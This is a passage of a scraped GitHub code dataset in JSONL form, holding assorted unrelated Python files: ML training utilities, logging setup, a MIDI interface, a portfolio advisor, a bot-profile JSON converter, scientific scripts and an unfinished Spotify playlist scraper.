seq2seq collator\n \"\"\"\n train_loader = DataLoader(\n tokenized_tr, \n batch_size=config_dict['batch_size'], \n collate_fn=seq2seq_data_collator, \n shuffle=True,\n pin_memory=True\n )\n \n optimizer=config_dict['optimizer']\n \n # Load the selected optimizer with the given hyper-parameters\n if(optimizer == 'adamW'):\n optimizer= torch.optim.AdamW(model.parameters(),\n lr = config_dict['lr'], \n eps = config_dict['eps'],\n weight_decay = config_dict['weight_decay']\n )\n elif (optimizer == 'sgd'):\n optimizer = torch.optim.SGD(model.parameters(),\n lr = config_dict['lr'],\n momentum = config_dict['momentum'],\n nesterov = config_dict['nesterov']\n )\n elif (optimizer == 'adam'):\n optimizer= torch.optim.Adam(model.parameters(),\n lr = config_dict['lr'], \n eps = config_dict['eps'],\n weight_decay = config_dict['weight_decay']\n )\n \n # Total number of training steps\n total_steps = len(train_loader) * config_dict['epochs']\n \n # Scheduler for the learning rate\n scheduler = get_linear_schedule_with_warmup(optimizer, \n num_warmup_steps = config_dict['warmup_steps'],\n num_training_steps = total_steps)\n \n loss_dict = None\n # If custom loss is set\n if config_dict['match_model_type'] != 'null':\n 
\n # Load Siamese Network from file\n match_model = SiameseNetwork(model_type=AutoModel.from_pretrained(config_dict['match_model_type']))\n match_model.load_state_dict(torch.load(\"../../../HLTKeyPointAnalysis/kp_match/models/model_82\"))\n \n # Move the siamese network to the desired device\n match_model.to(config_dict['device'])\n \n # Load corresponding tokenizer\n match_tokenizer = AutoTokenizer.from_pretrained(config_dict['match_model_type'])\n \n # Save custom loss configuration in dict\n loss_dict = {'gen_tokenizer': tokenizer, 'match_tokenizer': match_tokenizer, 'match_model': match_model, 'mode': config_dict['mode'], 'loss_function': compute_match_score}\n \n # Train model\n train_res = train(model, config_dict['device'], train_loader, optimizer, config_dict['epochs'], loss_dict, scheduler, config_dict['max_length'], verbose=True)\n \n # Evaluation of train predictions\n config_dict['train_metrics'] = [None] * len(train_res['predicted'])\n \n # For every epoch, compute selected metrics and store them\n for i, elem in enumerate(train_res['predicted']):\n dec_pred, dec_exp = decode_data(elem, train_res['labels'][i], tokenizer)\n config_dict['train_metrics'][i] = compute_metrics(dec_pred, dec_exp, config_dict['metrics'])\n \n \"\"\"\n Create DataLoader object for validation data, it is pinned to memory for efficiency, its batch size is set to 1.\n Like for the training dataset, the seq2seq collator is used\n \"\"\"\n val_loader = DataLoader(\n tokenized_val, \n batch_size=1,\n collate_fn=seq2seq_data_collator, \n shuffle=True,\n pin_memory=True\n )\n \n # Perform evaluation\n val_res = validate(model, config_dict['device'], val_loader, max_length=config_dict['max_length'])\n \n # Compute metrics\n config_dict['validation_metrics'] = [None] * len(val_res['predicted'])\n dec_pred, dec_exp = decode_data(val_res['predicted'], val_res['labels'], tokenizer)\n config_dict['validation_metrics'] = compute_metrics(dec_pred, dec_exp, config_dict['metrics'])\n \n # Remove useless data\n config_dict.pop('device')\n config_dict.pop('metrics')\n \n # Create a pd.DataFrame of the config with its results\n for key, value in config_dict.items():\n config_dict[key] = [config_dict[key]]\n \n df=pd.DataFrame(config_dict)\n \n # Store results (if file already exists, append the results otherwise create the .csv file)\n df.to_csv('../../../HLTKeyPointAnalysis/task2_grid_results.csv', mode='a', sep='#', index=False, header=False if path.exists(\"../../../HLTKeyPointAnalysis/task2_grid_results.csv\") else True)\n \n print(config_dict['validation_metrics'])\n","repo_name":"Jek9884/HLTKeyPointAnalysis","sub_path":"kp_generation/gen_utils.py","file_name":"gen_utils.py","file_ext":"py","file_size_in_byte":14033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"31761862395","text":"import torch\nfrom torch import nn\nfrom torch.nn import init\n\n\nnet = nn.Sequential(\n\tnn.Linear(4, 3), \n\tnn.ReLU(), \n\tnn.Linear(3, 1)) # pytorch已进行默认初始化\n\n\n# X = torch.rand(2, 4)\n# Y = net(X).sum()\n# print(Y)\n\n# 访问模型参数\nprint(type(net.named_parameters()))\nfor name, param in net.named_parameters():\n\tprint(name, param.size())\n\n# 访问第 0 层的参数\nprint('---')\nfor name, param in net[0].named_parameters():\n\tprint(name, param.size(), type(param))\n\nprint(\"---init---\")\n# 初始化模型参数\nfor name, param in net.named_parameters():\n\tif 'weight' in name:\n\t\tinit.normal_(param, mean=0, std=0.01)\n\t\tprint(name, 
param.data)\n","repo_name":"MoCuishle28/deep-learning-practice","sub_path":"nn-learn/model-init-share-visit.py","file_name":"model-init-share-visit.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"34419181583","text":"import logging\nimport sys\n\nfrom loguru import logger\n\n\nclass InterceptHandler(logging.Handler):\n \"\"\"\n A handler to push standard logging messages to loguru.\n\n This is directly from the loguru docs.\n \"\"\"\n def emit(self, record):\n # Get corresponding Loguru level if it exists\n try:\n level = logger.level(record.levelname).name\n except ValueError:\n level = record.levelno\n\n # Find caller from where originated the logged message\n frame, depth = logging.currentframe(), 2\n while frame.f_code.co_filename == logging.__file__:\n frame = frame.f_back\n depth += 1\n\n logger.opt(depth=depth, exception=record.exc_info).log(level, record.getMessage())\n\n\n# Push all std lib logger calls to loguru\nlogging.basicConfig(handlers=[InterceptHandler()], level=0)\n\n# Silence noisy libs\nlogging.getLogger(\"disnake\").setLevel(logging.ERROR)\nlogging.getLogger(\"asyncio\").setLevel(logging.ERROR)\n\n# Remove the default stderr sink, so we can add our own with custom formatting.\nlogger.remove()\n\n# Define logger format and add the sink.\nlogger_format = \"{time:YYYY-MM-DD at HH:mm:ss} | {level} | {name}:{line} | {message}\"\nlogger.add(sys.stdout, format=logger_format)\nlogger.add(\"logs/tyrant_log.log\", format=logger_format, retention=\"7 days\", rotation=\"10 MB\")\n","repo_name":"lemonsaurus/tyrant","sub_path":"tyrant/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"34779068609","text":"##\n# @file transmute/Dispatch/Dispatcher.py\n# @brief Contains the main dispatch director\n# @defgroup plugins\n# @{\n# @page Plugins\n# Transmute is based on a plugin architecture. This is implemented by the \n# @ref transmute.Dispatch.Dispatcher.Dispatcher \"Dispatcher\", and accomplished\n# by the importlib module. The @ref transmute.plugins.base \"base\" plugin provides the\n# base set of elements understood by transmute. 
The first output plugin is the\n# @ref transmute.plugins.wireshark \"wireshark\" plugin, which also serves as a sample\n# from which to develop further plugins.\n# @}\nimport os\nimport logging\nimport importlib\n\n##\n# @brief All of the items exported by this module\n__all__ = [\"Dispatcher\", \"DispatchError\"]\n##\n# @brief The module's top-level logger\n_logger = logging.getLogger('transmute.Dispatch')\n\n##\n# @class Dispatcher\n# @brief Directs the dispatch process for fully-parsed elements.\nclass Dispatcher(object):\n ##\n # @name __init__\n # @brief Load modules for dispatch\n # @param package [in] The directory from which to load modules\n # @param relative_to [in] The path in which package resides\n def __init__(self, package, relative_to='transmute'):\n self.log = logging.getLogger('transmute.Dispatch.Dispatcher')\n self.log.debug(\"Setting up Dispatcher for {}\".format(os.path.join(relative_to, package)))\n pkg = ['transmute'] + package.split(os.path.sep)\n self._pmod = [importlib.import_module(''.join(['.', pkg[pivot]]), '.'.join(pkg[:pivot])) for pivot in range(1, len(pkg))]\n self.log.debug(\"Parent modules: {}\".format([pmod.__name__ for pmod in self._pmod]))\n self.modules = [importlib.import_module(''.join(['.', mod[:-3]]), '.'.join(pkg)) for mod in (\n f for f in os.listdir(os.path.join('transmute', package)) if (f.endswith('.py') and f != '__init__.py'))\n ]\n self.log.debug(\"Loaded modules: {}\".format([mod.__name__ for mod in self.modules]))\n \n ##\n # @name register_all\n # @brief Register all of the loaded modules.\n def register_all(self, args_parser, xml_parser):\n for mod in self.modules:\n mod.register(args_parser, xml_parser)\n \n ##\n # @name push\n # @brief Push a @ref transmute.Dispatch.Dispatchable.Dispatchable \"Dispatchable\" to every loaded module.\n def push(self, dispatchable_obj):\n for mod in self.modules:\n mod.dispatch(dispatchable_obj)\n \n ##\n # @name getModules\n # @brief Get a list of all of the loaded modules.\n def getModules(self):\n #a copy of self.modules, to prevent accidental changes to the list\n return [mod for mod in self.modules]\n","repo_name":"Rakankou/transmute","sub_path":"transmute/Dispatch/Dispatcher.py","file_name":"Dispatcher.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"71556170190","text":"import os\nimport json\n\n\ndef read_dataset(dataset_path, num_instances):\n question_json_path = os.path.join(dataset_path, \"MultipleChoice_mscoco_val2014_questions.json\")\n questions = json.load(open(question_json_path, 'rt'))[\"questions\"]\n\n image_dir = os.path.join(dataset_path, \"coco_images/val2014\")\n audio_dir = os.path.join(dataset_path, \"questions_speech/val2014\")\n\n image_paths = []\n audio_paths = []\n for question in questions:\n image_id = question[\"image_id\"]\n question_id = question[\"question_id\"]\n image_path = os.path.join(image_dir, \"COCO_val2014_{:012d}.jpg\".format(image_id))\n audio_path = os.path.join(audio_dir, \"{}.flac\".format(question_id))\n image_paths.append((question_id, image_path))\n audio_paths.append((question_id, audio_path))\n \n image_paths.sort(key=lambda x: x[0])\n audio_paths.sort(key=lambda x: x[0])\n\n image_paths = image_paths[:num_instances]\n audio_paths = audio_paths[:num_instances]\n image_paths = list(map(lambda x: (x[0], x[1][1]), enumerate(image_paths)))\n audio_paths = list(map(lambda x: (x[0], x[1][1]), enumerate(audio_paths)))\n\n return image_paths, 
audio_paths\n ","repo_name":"libertyeagle/JellyBean","sub_path":"VQA/python/models_profiler/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"83"} +{"seq_id":"2172502797","text":"import matplotlib.pyplot as plt\nimport oscilator as ho\nimport numpy as np\n\nh2 = ho.HarmonicOscillator(1.0,0.0,1.0,1.0)\n\nfig,ax = plt.subplots()\nlista_dt = [0.001,0.01,0.05]\n\nfor dt in lista_dt:\n T = 3*h2.period(dt)\n t, x_num = h2.oscillate(dt,T) \n x_anal = h2.x_analitičko(t) \n\n plt.plot(t,x_anal)\n plt.scatter(t,x_num)\n\nplt.xlabel(\"t\")\nplt.ylabel(\"x\")\nplt.legend([\"analitički\",\"numerički\"])\nplt.show()\n\n\n","repo_name":"leajambr/PAF","sub_path":"vjezbe_6/zadatak_2.py","file_name":"zadatak_2.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"41192932543","text":"#!/usr/bin/python3\n\nfrom pygame import midi as midi\nimport inspect\n\n# Not the best solution with this class, \n# dataclass structures were introduced in Python 3.7\n# but VSERPi images are mostly distributed with <3.7 version,\n# so for sake of simplicity I decided to make \"workaround\"\nclass DeviceInfo:\n def __init__(self, name, input):\n self.name = name\n self.input = input\n\n name = None\n input = None\n\n\nclass MidiInterface:\n _connectedDeviceId = -1\n _deviceInfo = DeviceInfo('N\\\\A', -1)\n _midiController = None\n\n def __init__(self):\n midi.init()\n self.scanForDevices()\n self._midiController = midi.Input(self._connectedDeviceId)\n\n def getDeviceName(self):\n device = midi.get_device_info(self._connectedDeviceId)\n # print(str(device[1]).split(\"'\")[1])\n device_info = DeviceInfo(str(device[1]).split(\"'\")[1], device[2])\n return device_info.name\n\n def scanForDevices(self):\n devices_number = midi.get_count()\n # print(\"devices_number: \", devices_number)\n if devices_number > 0:\n for deviceIndex in range(0, devices_number):\n # get_device_info(an_id) -> (interf, name, input, output, opened)\n device = midi.get_device_info(deviceIndex)\n device_info = DeviceInfo(str(device[1]).split(\"'\")[1], device[2])\n\n print(\"Found devices list: \")\n if device_info.input is 1: # \"input\" tells if \"device\" is input or output, 0 for 0utput, 1 for 1nput\n print(\" - \", device_info.name)\n\n\n if \"nanoKONTROL2\" in device_info.name and device_info.input == 1:\n print(\"New device name: \", device_info.name, \" , new device index: \", deviceIndex,sep=\"\") # todo logic some kind of\n self._connectedDeviceId = deviceIndex\n self._deviceInfo.name = device_info.name\n self._deviceInfo.input = device_info.input\n # return True\n elif device_info.input == 1 and self._connectedDeviceId == -1:\n self._deviceInfo.name = device_info.name\n self._deviceInfo.input = device_info.input\n self._connectedDeviceId = deviceIndex\n \n\n if self._connectedDeviceId != -1:\n return True\n else:\n return False\n\n def checkConnection(self):\n if self._connectedDeviceId == -1:\n return False\n\n device = midi.get_device_info(self._connectedDeviceId)\n device_info = DeviceInfo(str(device[1]).split(\"'\")[1], device[2])\n if \"nanoKONTROL2\" in device_info.name and device_info.input == 1:\n return True\n if self.scanForDevices() is True:\n return True\n return False\n\n def getMidiMsg(self):\n #print(\"connectedDeviceId = \", self._connectedDeviceId)\n midiInput = self._midiController.read(1)\n if len(midiInput) > 
0:\n # print(midiInput[0][0])\n return(midiInput[0][0])\n return None \n #print(inspect.stack()[0][3])\n\n def menuMidiChoice(self, button):\n print(\"non available\")\n\n def printDevices(self):\n devices_number = midi.get_count()\n if devices_number > 0:\n for deviceIndex in range(0, devices_number):\n # get_device_info(an_id) -> (interf, name, input, output, opened)\n device = midi.get_device_info(deviceIndex)\n device_info = DeviceInfo(str(device[1]).split(\"'\")[1], device[2])\n #print(device_info.name, device_info.input)\n\n\n\nif __name__ == '__main__':\n midiInterface = MidiInterface()\n midiInterface.printDevices()\n while True:\n midiInterface.getMidiMsg()\n","repo_name":"aleksoo/vserpi_menu","sub_path":"MidiInterface.py","file_name":"MidiInterface.py","file_ext":"py","file_size_in_byte":3794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"26560852325","text":"\nimport recommender as recom\nfrom pyfancy import pyfancy\nimport time\n\ndef advisor5(client_portfolio, allSecurities, economy):\n \n divers_sectors, divers_percent = recom.bc_sector_allocation(economy)\n # categorize existing securities by type of asset\n pyfancy.pyfancy().cyan(\"\\n*** Portfolio analysis.... ***\\n\").output()\n time.sleep(1)\n stocks_held, bonds_held = client_portfolio.extract_securities_by_type(allSecurities)\n \n # categorize existing securities by sector\n pyfancy.pyfancy().cyan(\"\\n *** Sectors you currently hold in stocks: ***\").output()\n time.sleep(2)\n portfolio_sector_dict = client_portfolio.categorize_stocks_by_sector(allSecurities)\n \n # calculate recommended percentages per sector\n pyfancy.pyfancy().cyan(\"\\n *** Sectors recommended to hold in stocks: ***\").output()\n time.sleep(2)\n recomm_sector_dict = recom.recomm_sector_allocation(client_portfolio.portfolio, divers_percent, divers_sectors, sum(portfolio_sector_dict.values()))\n \n # add recommended sectors that do not exist\n pyfancy.pyfancy().cyan(\"\\n *** Looking for sectors that should not be in your portfolio ***\").output()\n time.sleep(2)\n sectors_to_del = client_portfolio.sectors_you_should_not_have(recomm_sector_dict, portfolio_sector_dict)\n if (len(sectors_to_del)==0):\n print ('No sectors to remove')\n else:\n for sector_del in sectors_to_del:\n client_portfolio.deleteSector(sector_del, allSecurities)\n \n \n # refine securities per sector\n pyfancy.pyfancy().cyan(\"\\n *** Refining exposure for sectors you hold ***\").output()\n time.sleep(2)\n for key, value in recomm_sector_dict.items():\n \n time.sleep(1)\n diff = recomm_sector_dict[key] - portfolio_sector_dict.get(key, 0) \n \n if (diff == recomm_sector_dict[key]):\n # portfolio does not contain the recommended sector\n print ('No {} in the portfolio. You should add {} of them'.format(key, value))\n recommendations = recom.rank_stocks_without_bc(key)\n pop = recom.recommend_stock(recommendations) \n security = next(pop)\n client_portfolio.addNewSecurity(security, value, allSecurities)\n \n elif (diff > 0):\n print ('You have {}% of {}. 
You should have {}% in {}.'.format(portfolio_sector_dict.get(key, 0), key, recomm_sector_dict.get(key, 0), key))\n current_holdings = client_portfolio.extract_securities_by_sector(key, allSecurities)\n print (\"Currently holding {} stocks in sector {}:\".format(len(current_holdings), key))\n for k, v in current_holdings.items():\n pyfancy.pyfancy().bold().white(\"{} {} %\".format(k,v)).output()\n\n recommendations = recom.rank_stocks_without_bc(key)\n pop = recom.recommend_stock(recommendations) \n security = next(pop)\n client_portfolio.addNewSecurity(security, diff, allSecurities)\n \n elif (diff < 0):\n print ('You have {}% of {}. You should have {}% in {}.'.format(portfolio_sector_dict.get(key, 0), key, recomm_sector_dict.get(key, 0), key))\n current_holdings = client_portfolio.extract_securities_by_sector(key, allSecurities)\n print (\"Currently holding {} stocks in sector {}:\".format(len(current_holdings), key))\n for k, v in current_holdings.items():\n pyfancy.pyfancy().bold().white(\"{} {} %\".format(k,v)).output()\n current_holdings_list = sorted(current_holdings, key=current_holdings.get, reverse=True)\n diff = diff * (-1)\n for k in current_holdings_list:\n v = current_holdings[k]\n if diff == 0:\n break\n elif (diff > 0 and v > diff):\n client_portfolio.setExposure(k, v - diff)\n diff = 0\n elif (diff > 0 and v <= diff):\n client_portfolio.deteleSecurity(k, allSecurities)\n diff -= v\n #print ('\\n \\n Exposure left in portfolio: {}'.format(client_portfolio.extra_exposure))\n stocks_held, bonds_held = client_portfolio.extract_securities_by_type(allSecurities) \n return client_portfolio","repo_name":"rucsa/thesis_benchmark_advisor","sub_path":"advisor5worker.py","file_name":"advisor5worker.py","file_ext":"py","file_size_in_byte":4292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"42913806172","text":"\"\"\"\n42. 
接雨水\n\n给定 n 个非负整数表示每个宽度为 1 的柱子的高度图,计算按此排列的柱子,下雨之后能接多少雨水。\n\n\n\n上面是由数组 [0,1,0,2,1,0,1,3,2,1,2,1] 表示的高度图,在这种情况下,可以接 6 个单位的雨水(蓝色部分表示雨水)。 感谢 Marcos 贡献此图。\n\n示例:\n\n输入: [0,1,0,2,1,0,1,3,2,1,2,1]\n输出: 6\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/trapping-rain-water\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\n\n\"\"\"\n\n\nclass Solution:\n def trap(self, height):\n ans = 0\n h1 = 0\n h2 = 0\n for i in range(len(height)):\n h1 = max(h1, height[i])\n h2 = max(h2, height[-i - 1])\n ans = ans + h1 + h2 - height[i]\n return ans - len(height) * h1\n\n\nif __name__ == '__main__':\n solu = Solution()\n print(solu.trap([0, 1, 0, 2, 1, 0, 1, 3, 2, 1, 2, 1]))\n","repo_name":"song61069140/LeetCodePython","sub_path":"question_01_99/question_42.py","file_name":"question_42.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"17395632443","text":"\"\"\"\r\n\r\nWhat this class does\r\n\r\n\r\n\"\"\"\r\nfrom io import StringIO\r\n\r\nfrom Config import Config\r\nfrom Profile import Profile\r\n\r\n\r\nclass Wrath:\r\n\r\n def create_profile(self, profile):\r\n config = Config()\r\n expdate = profile.exp_date.split()\r\n exp_month = expdate[0]\r\n exp_year = expdate[2]\r\n card_type = config.get_card_type(profile.card_number)\r\n if card_type == 'American Express':\r\n card_type = 'Amex'\r\n file = str([{\r\n \"billingAddress\": {\r\n \"city\": profile.city,\r\n \"country\": profile.country,\r\n \"email\": profile.email,\r\n \"line1\": profile.address,\r\n \"line2\": profile.apt,\r\n \"line3\": \"\",\r\n \"name\": f'{profile.first_name} {profile.last_name}',\r\n \"phone\": profile.phone,\r\n \"postCode\": profile.zip_code,\r\n \"state\": config.us_state_abbreviations[profile.state]\r\n },\r\n \"name\": profile.profile_name,\r\n \"onlyCheckoutOnce\": \"FALSE\",\r\n \"paymentDetails\": {\r\n \"cardCvv\": profile.cvv,\r\n \"cardExpMonth\": exp_month,\r\n \"cardExpYear\": exp_year,\r\n \"cardNumber\": profile.card_number,\r\n \"cardType\": card_type,\r\n \"nameOnCard\": profile.card_holder_name\r\n },\r\n \"sameBillingAndShippingAddress\": \"true\",\r\n \"shippingAddress\": {\r\n \"city\": profile.city,\r\n \"country\": profile.country,\r\n \"email\": profile.email,\r\n \"line1\": profile.address,\r\n \"line2\": profile.apt,\r\n \"line3\": \"\",\r\n \"name\": f'{profile.first_name} {profile.last_name}',\r\n \"phone\": profile.phone,\r\n \"postCode\": profile.zip_code,\r\n \"state\": config.us_state_abbreviations[profile.state]\r\n }\r\n }])\r\n file = file.replace(\"'\", '\"').replace(\": \", \":\").replace(\", \", \",\").replace('\"true\"', \"true\").replace(\"False\",\"false\").replace(\"True\", \"true\")\r\n file = StringIO(file)\r\n return file\r\n\r\n def create_profiles(self, profiles):\r\n file = \"\"\r\n if type(profiles[0]) == Profile:\r\n for profile in profiles:\r\n file += f'{str(self.create_profile(profile).readline())[1:-1]},'\r\n else:\r\n for profile in profiles:\r\n file += f'{str(profile)[1:-1]},'\r\n file = file.replace(\"'\", '\"').replace(\": \", \":\").replace(\", \", \",\").replace('\"true\"', \"true\").replace(\"False\",\"false\").replace(\"True\", \"true\")\r\n file = f\"[{str(file)[:-1]}]\"\r\n file = StringIO(file)\r\n return file\r\n","repo_name":"andrewgalvin/DiscordProfileConverter","sub_path":"BotProfiles/Wrath.py","file_name":"Wrath.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} 
+{"seq_id":"891629538","text":"import pandas as pd\nimport argparse\nimport os\n\n\ndesctiptionStr = '''\nExtract and de-replicate GO terms for BiNGO reference:\nThe format of custom annotation/ontology files in BiNGO is the same as the Cytoscape annotation and ontology file formats. To make a custom annotation file, just parse your annotation into the following form :\n\n(species=Saccharomyces cerevisiae)(type=Biological Process)(curator=GO)\nYAL001C = 0006384\nYAL002W = 0045324\nYAL002W = 0045324\nYAL003W = 0006414\nYAL004W = 0000004\nYAL005C = 0006616\nYAL005C = 0006457\nYAL005C = 0000060\nYAL007C = 0006888\nYAL008W = 0000004\n...\n'''\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description='Extract and de-replicate GO terms for BiNGO reference')\n parser.add_argument('path')\n parser.add_argument('--species', help='species', default='Not_set')\n parser.add_argument(\n '--curator', help='curator, generator of the annotation', default='Not_set')\n args = parser.parse_args()\n interproscanOutTsv = args.path.strip()\n species = args.species\n curator = args.curator\n convertedFile = f'{os.path.splitext(interproscanOutTsv)[0]}_GO.tair'\n source = pd.read_csv(interproscanOutTsv, sep='\\t', header=None, usecols=[0, 13])\n # print(source.head(10))\n with open(convertedFile, 'w') as writer:\n # write header:\n writer.write(f'(species={species})(type=general)(curator={curator})\\n')\n # I am not sure but the type seems not important at all, because BiNGO have its own\n # database for the hierarchy. It might be useful only as an identifier if you need to customize\n # the reference to part of the genome/proteome.\n for num, line in source.iterrows():\n if pd.isna(line.loc[13]):\n continue\n else:\n gos = line.loc[13].split('|')\n gos = [go.split(':')[1] for go in gos]\n id = line.loc[0]\n for go in gos:\n writer.write(f'{id} = {go}\\n')\n\n print(convertedFile)\n","repo_name":"snail123815/BIO_tools","sub_path":"For_other_tools/parse_interproscann_go_annotation_BiNGO.py","file_name":"parse_interproscann_go_annotation_BiNGO.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"30173589740","text":"import numpy as np\r\n\r\n#downsample a trajectory of n points to m points based on distance between those points\r\n\r\n#function to get the total distance of a n x d trajectory\r\n#arguments\r\n#traj: nxd vector, where n is number of points and d is number of dims\r\n#returns the total distance of traj, calculated using euclidean distance \r\ndef get_traj_dist(traj):\r\n dist = 0.\r\n for n in range(len(traj) - 1):\r\n dist = dist + np.linalg.norm(traj[n + 1] - traj[n])\r\n #if (DEBUG):\r\n # print('Traj total dist: %f' % (dist))\r\n return dist\r\n \r\n#downsample to a certain number of points\r\ndef db_downsample(traj, new_len):\r\n (n_pts, n_dims) = np.shape(traj)\r\n total_dist = get_traj_dist(traj)\r\n interval_len = total_dist / (new_len - 1)\r\n sum_len = 0.0\r\n out_traj = np.zeros((new_len, n_dims))\r\n ind = 0\r\n for n in range(n_pts - 1):\r\n if (sum_len >= 0.0):\r\n out_traj[ind, :] = traj[n, :]\r\n ind += 1\r\n sum_len -= interval_len\r\n sum_len += np.linalg.norm(traj[n + 1] - traj[n])\r\n out_traj[-1, :] = traj[-1, :]\r\n return out_traj\r\n \r\n#downsample to a certain distance between points\r\ndef db_downsample_dist(traj, seg_len):\r\n (n_pts, n_dims) = np.shape(traj)\r\n interval_len = seg_len\r\n sum_len = 0.0\r\n out_traj = np.zeros((n_pts, n_dims))\r\n 
ind = 0\r\n for n in range(n_pts - 1):\r\n if (sum_len >= 0.0):\r\n out_traj[ind, :] = traj[n, :]\r\n ind += 1\r\n sum_len -= interval_len\r\n sum_len += np.linalg.norm(traj[n + 1] - traj[n])\r\n out_traj[ind, :] = traj[-1, :]\r\n ind += 1\r\n out_traj = out_traj[0:ind]\r\n return out_traj\r\n\r\n#main program for testing \r\nif __name__ == '__main__':\r\n x = np.linspace(0, 10, 1000)\r\n #y = np.sin(x)\r\n y = (x - 5)**3\r\n traj = np.transpose(np.vstack((x, y)))\r\n ds_traj = db_downsample(traj, 10)\r\n import matplotlib.pyplot as plt\r\n plt.figure()\r\n plt.plot(traj[:, 0], traj[:, 1], 'b', lw=3)\r\n plt.plot(ds_traj[:, 0], ds_traj[:, 1], 'r-.', lw=3, ms=7)\r\n plt.show()\r\n \r\n ","repo_name":"brenhertel/Pearl-ur5e","sub_path":"brendan_ur5e/src/scripts/elmap_code/scripts/db_downsample.py","file_name":"db_downsample.py","file_ext":"py","file_size_in_byte":2086,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"35098255956","text":"import argparse\n\nimport __init_path__\n\nfrom scripts.graph_optimization import g2o_configs\nfrom scripts.graph_optimization.base_search import BaseSearch\nfrom slam.graph_optimization import TrajectoryEstimator\n\n\ndef main(dataset_root,\n config_type,\n strides,\n strides_sigmas,\n loop_sigma,\n loop_threshold,\n rotation_weight,\n max_iterations,\n vis_dir,\n pred_dir):\n\n assert len(strides) == len(strides_sigmas)\n strides_sigmas = {stride: weight for stride, weight in zip(strides, strides_sigmas)}\n config = getattr(g2o_configs, config_type)\n trajectory_names = BaseSearch().get_trajectory_names(config['1'][0])\n rpe_indices = BaseSearch().get_rpe_mode(config)\n X, y, groups = BaseSearch().get_data(config=config,\n dataset_root=dataset_root,\n trajectory_names=trajectory_names,\n val_mode='last')\n estimator = TrajectoryEstimator(strides_sigmas=strides_sigmas,\n loop_sigma=loop_sigma,\n loop_threshold=loop_threshold,\n rotation_weight=rotation_weight,\n max_iterations=max_iterations,\n rpe_indices=rpe_indices,\n verbose=True,\n vis_dir=vis_dir,\n pred_dir=pred_dir)\n metrics = estimator.predict(X, y, visualize=True, trajectory_names=trajectory_names)\n print(metrics)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--dataset_root', type=str)\n parser.add_argument('--config_type', type=str, help='Name of config defined in g2o_configs.py')\n parser.add_argument('--strides', type=str, nargs='+',\n help='List of strides. For these strides weights must be provided')\n parser.add_argument('--strides_sigmas', type=int, nargs='+',\n help='Std of predictions from networks trained on different strides')\n parser.add_argument('--loop_sigma', type=int,\n help='Std of prediction from network trained on relocalization estimator results')\n parser.add_argument('--loop_threshold', type=int,\n help='Threshold value used to detect loops. 
Relocalization estimator returns pairs of similar '\n 'frames (frame_i, frame_j).'\n 'If (j - i) > loop_threshold then the pair of similar frames is considered to be the start'\n 'and the end of the loop')\n parser.add_argument('--rotation_weight', type=float,\n help='weight of rotation constrains.')\n parser.add_argument('--max_iterations', type=int, default=5000,\n help='Limit of iterations in g2o backend')\n parser.add_argument('--vis_dir', type=str, help='Path to visualization dir')\n parser.add_argument('--pred_dir', type=str, help='Path to prediction dir')\n\n args = parser.parse_args()\n main(**vars(args))\n","repo_name":"SamsungLabs/odometry","sub_path":"scripts/graph_optimization/estimate_trajectory.py","file_name":"estimate_trajectory.py","file_ext":"py","file_size_in_byte":3222,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"85"} +{"seq_id":"9050630959","text":"import requests\nimport bs4\nimport spotipy\nfrom spotipy.oauth2 import SpotifyOAuth\nimport smtplib\nimport os\n\n\nclass Send:\n \n def __init__(self):\n \n self.username = os.system.environ[\"username\"]\n self.scope = 'playlist-modify-public'\n self.client_id = os.system.environ[\"id\"]\n self.client_secret = os.system.environ[\"secret\"]\n self.redirect_uri = \"http://localhost:8888/callback\"\n \n def get_info(self):\n \n self.date = \"\"\n self.ig = self.e_ig.get()\n \n if int(self.eday.get()) < 10 and int(self.emonth.get()) < 10:\n self.date = f\"0{self.eyear.get()}-0{self.emonth.get()}-{self.eday.get()}\"\n \n elif int(self.emonth.get()) < 10:\n self.date = f\"{self.eyear.get()}-0{self.emonth.get()}-{self.eday.get()}\"\n \n elif int(self.eday.get()) < 10:\n self.date = f\"0{self.eyear.get()}-{self.emonth.get()}-{self.eday.get()}\"\n \n \n \n def get_songs(self):\n \n url = f\"https://www.billboard.com/charts/hot-100/{self.date}/\"\n soup = bs4.BeautifulSoup(requests.get(url).text, \"lxml\")\n soup = soup.find_all(\"div\", class_ = \"o-chart-results-list-row-container\")\n self.songs = [ b.find(\"h3\").getText(strip = True) for b in soup]\n \n \n def create_spotify_list(self):\n \n self.auth_manager = SpotifyOAuth(self.client_id, self.client_secret,\n self.redirect_uri,scope = \"playlist-modify-public\")\n \n self.list_songs = spotipy.Spotify(auth_manager = self.auth_manager)\n \n self.list_songs.user_playlist_create(self.username, \"The list obada made me\",\n True, False, \"created by obada\")\n \n \n def add_songs_to_list(self):\n\n self.playlist_id = 